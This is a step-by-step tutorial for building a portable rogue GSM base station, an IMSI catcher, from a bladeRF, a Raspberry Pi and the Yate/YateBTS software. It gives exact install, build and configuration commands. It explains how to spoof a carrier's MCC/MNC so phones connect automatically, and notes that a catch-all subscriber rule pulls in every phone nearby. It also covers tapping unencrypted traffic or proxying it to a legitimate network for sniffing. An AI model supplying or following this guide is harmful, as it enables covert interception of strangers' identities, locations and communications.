A GSM Base Transceiver Station is a piece of equipment that facilitates communication between mobile phones and the mobile providers network. By building our own, we can trick mobile phones into connecting to it. These BTS can be configured to capture IMSI, location and other data from mobile phones connecting to them. This is exactly what the government does with their "stingray" devices. Except ours costs under $600!
EvilSocket has done a great job in his post "How to Build Your Own Rogue GSM BTS for Fun and Profit". But we will go a little further with our setup.
In order to build your BTS you’ll need the following hardware:
- A bladeRF x40. (USD $420)
- A bladeRF case. (USD $20)
- Two Quad-band Cellular Duck Antennas SMA. (USD $15)
- A Raspberry Pi 3 kit w/ microsd. (USD $70)
- An Anker Astro E7 26800mAh Portable Charger. (USD $55)
All for a grand total of USD $580... Not bad considering the government bills taxpayers for over $200,000 a pop for one of these.
Installing the latest Raspbian image to the micrsd card, boot the RPI, configure either the WiFi or ethernet and so forth, at the end of this process you should be able to SSH into the RPI.
Next, install a few dependencies we’re gonna need soon:
sudo apt-get install git apache2 php5 bladerf libbladerf-dev libbladerf0 automake
At this point, you should already be able to interact with the BladeRF, plug it into one of the USB ports of the RPI, dmesg should be telling you something like:
[ 2332.071675] usb 1-1.3: New USB device found, idVendor=1d50, idProduct=6066 [ 2332.071694] usb 1-1.3: New USB device strings: Mfr=1, Product=2, SerialNumber=3 [ 2332.071707] usb 1-1.3: Product: bladeRF [ 2332.071720] usb 1-1.3: Manufacturer: Nuand [ 2332.071732] usb 1-1.3: SerialNumber: b4ef330e19b718f752759b4c14020742
Start the bladeRF-cli utility and issue the version command:
pi@raspberrypi:~ $ sudo bladeRF-cli -i bladeRF> version bladeRF-cli version: 0.11.1-git libbladeRF version: 0.16.2-git Firmware version: 1.6.1-git-053fb13-buildomatic FPGA version: 0.1.2 bladeRF>
IMPORTANT Make sure you have these exact versions of the firmware and the FPGA, other versions might not work in our setup.
Download the correct firmware and FPGA image.
Now we’re going to install Yate and YateBTS, two open source softwares that will make us able to create the BTS itself.
Since I spent a lot of time trying to figure out which specific version of each was compatible with the bladeRF, I’ve created a github repository with correct versions of both, so in your RPI home folder just do:
git clone https://github.com/evilsocket/evilbts.git cd evilbts
Let’s start building both of them:
cd yate ./autogen.sh ./configure --prefix=/usr/local make -j4 sudo make install sudo ldconfig cd .. cd yatebts ./autogen.sh ./configure --prefix=/usr/local make -j4 sudo make install sudo ldconfig
This will take a few minutes, but eventually you’ll have everything installed in your system.
Next, we’ll symlink the NIB web ui into our apache www folder:
cd /var/www/html/ sudo ln -s /usr/local/share/yate/nib_web nib
And grant write permission to the configuration files:
sudo chmod -R a+w /usr/local/etc/yate
You can now access your BTS web ui from your browser:
Time for some configuration now!
Open the /usr/local/etc/yate/ybts.conf file either with nano or vi and update the following values:
Radio.Band=900 Radio.C0=1000 Identity.MCC=YOUR_COUNTRY_MCC Identity.MNC=YOUR_OPERATOR_MNC Identity.ShortName=MyEvilBTS Radio.PowerManager.MaxAttenDB=35 Radio.PowerManager.MinAttenDB=35
You can find valid MCC and MNC values here.
Now, edit the /usr/local/etc/yate/subscribers.conf:
WARNING Using the .* regular expression will make EVERY GSM phone in your area connect to your BTS.
In your NIB web ui you’ll see something like this:
In the “Tapping” panel, you can enable it for both GSM and GPRS, this will basically “bounce” every GSM packet to the loopback interface, since we haven’t configure any encryption, you’ll be able to see all the GSM traffic by simply tcpdump-ing your loopback interface :D
Finally, you can start your new BTS by executing the command ( with the BladeRF plugged in! ) :
sudo yate -s
If everything was configured correctly, you’ll see a bunch of messages and the line:
Starting MBTS... Yate engine is initialized and starting up on raspberrypi RTNETLINK answers: File exists MBTS ready
At this point, the middle LED for your bladeRF should start blinking.
Now, phones will start to automatically connect, this will happen because of the GSM implementation itself:
- You can set whatever MCC, MNC and LAC you like, effectly spoofing any legit GSM BTS.
- Each phone will search for BTS of its operator and select the one with the strongest signal … guess which one will be the strongest? Yep … ours :D
Here’s a picture taken from my Samsung Galaxy S6 ( using the Network Cell Info Lite app ) which automatically connected to my BTS after 3 minutes:
From now on, you can configure the BTS to do whatever you want … either act as a “proxy” to a legit SMC ( with a GSM/3g USB dongle ) and sniff the unencrypted GSM traffic of each phone, or to create a private GSM network where users can communicate for free using SIP, refer to the YateBTS Wiki for specific configurations.
Oh and of course, if you plug the USB battery, the whole system becomes completely portable :)